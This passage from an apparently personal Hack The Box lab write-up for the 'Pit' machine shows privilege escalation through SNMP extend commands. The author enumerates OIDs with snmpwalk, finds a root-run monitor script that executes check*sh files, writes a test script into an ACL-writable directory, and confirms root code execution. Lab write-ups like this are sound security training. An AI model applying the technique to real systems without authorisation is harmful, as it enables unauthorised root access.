nsExtendCommand
┌──(kali㉿kali)-[~/archive/htb/labs/pit]
└─$ snmpwalk -v 1 -c public $IP net-snmp-extend-mib::nsExtendCommand
net-snmp-extend-mib::nsExtendCommand."memory" = STRING: /usr/bin/free
net-snmp-extend-mib::nsExtendCommand."monitoring" = STRING: /usr/bin/monitorearlier, i found out that the net-snmp-extend-mib::nsExtendCommand OID, “monitoring”, is executing a binary at /usr/bin/monitor
according to the documentation found in the Official RHEL website, the NET-SNMP-EXTEND-MIB MIB is an extension to Net-SNMP Agent that can be used to query arbitrary shell scripts.
it is specified in the /etc/snmp/snmpd.conf file. once queried/appended/specified, those becomes individual net-snmp-extend-mib::nsExtendObjects OID that get executed every time SNMP gets called
in the current assessment, an unknown binary is being called from the net-snmp-extend-mib::nsExtendCommand.”monitoring” OID, pointing to /usr/bin/monitor
/usr/bin/monitor
[michelle@pit local]$ ll /usr/bin/monitor
-rwxr--r--. 1 root root 88 Apr 18 2020 /usr/bin/monitor
[michelle@pit local]$ cat /usr/bin/monitor
#!/bin/bash
for script in /usr/local/monitoring/check*sh
do
/bin/bash $script
doneThe /usr/bin/monitor file is a Bash script that the following:
- checks for
check*shfiles under the/usr/local/monitoring/directory - execute them
/usr/local/monitoring with ACL
[michelle@pit local]$ ll /usr/local/monitoring
ls: cannot open directory '/usr/local/monitoring': Permission deniedI am unable to view the /usr/local/monitoring directory
[michelle@pit local]$ ll /usr/local/
total 0
[...REDACTED...]
drwxrwx---+ 2 root root 101 apr 7 13:45 monitoring
[...REDACTED...]Checking the parent directory reveals that the directory has access control entries (ACEs) set; (+ sign in the permission bits area)
This must be what PEAS picked up earlier
It showed that the michelle user has write and execute permissions to the directory, but unable to read
Let’s test the write permission
Code Execution
[michelle@pit monitoring]$ echo 'id' > /usr/local/monitoring/check_test.shI put a command, id, to test the code execution
┌──(kali㉿kali)-[~/archive/htb/labs/pit]
└─$ snmpwalk -v 1 -c public $IP NET-SNMP-EXTEND-MIB::nsExtendOutLine
NET-SNMP-EXTEND-MIB::nsExtendOutLine."memory".1 = STRING: total used free shared buff/cache available
NET-SNMP-EXTEND-MIB::nsExtendOutLine."memory".2 = STRING: Mem: 4023492 537080 2540292 46640 946120 3150152
NET-SNMP-EXTEND-MIB::nsExtendOutLine."memory".3 = STRING: Swap: 1961980 0 1961980
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".1 = STRING: Database status
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".2 = STRING: OK - Connection to database successful.
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".3 = STRING: System release info
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".4 = STRING: CentOS Linux release 8.3.2011
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".5 = STRING: SELinux Settings
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".6 = STRING: user
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".7 = STRING:
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".8 = STRING: Labeling MLS/ MLS/
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".9 = STRING: SELinux User Prefix MCS Level MCS Range SELinux Roles
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".10 = STRING:
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".11 = STRING: guest_u user s0 s0 guest_r
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".12 = STRING: root user s0 s0-s0:c0.c1023 staff_r sysadm_r system_r unconfined_r
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".13 = STRING: staff_u user s0 s0-s0:c0.c1023 staff_r sysadm_r unconfined_r
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".14 = STRING: sysadm_u user s0 s0-s0:c0.c1023 sysadm_r
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".15 = STRING: system_u user s0 s0-s0:c0.c1023 system_r unconfined_r
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".16 = STRING: unconfined_u user s0 s0-s0:c0.c1023 system_r unconfined_r
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".17 = STRING: user_u user s0 s0 user_r
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".18 = STRING: xguest_u user s0 s0 xguest_r
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".19 = STRING: login
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".20 = STRING:
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".21 = STRING: Login Name SELinux User MLS/MCS Range Service
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".22 = STRING:
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".23 = STRING: __default__ unconfined_u s0-s0:c0.c1023 *
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".24 = STRING: michelle user_u s0 *
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".25 = STRING: root unconfined_u s0-s0:c0.c1023 *
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".26 = STRING: uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:snmpd_t:s0
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".27 = STRING: System uptime
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".28 = STRING: 15:11:19 up 12:10, 4 users, load average: 0.04, 0.06, 0.07
End of MIBI specified the NET-SNMP-EXTEND-MIB::nsExtendOutLine OID in this case
The code execution is confirmed as uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:snmpd_t:s0 is printed out in the output
Although the execution was made with privileges of the root user, it seems that it is still under the influence of the security policy set by SELinux; context=system_u:system_r:snmpd_t:s0
Nevertheless, I should be able to escalate privileges this way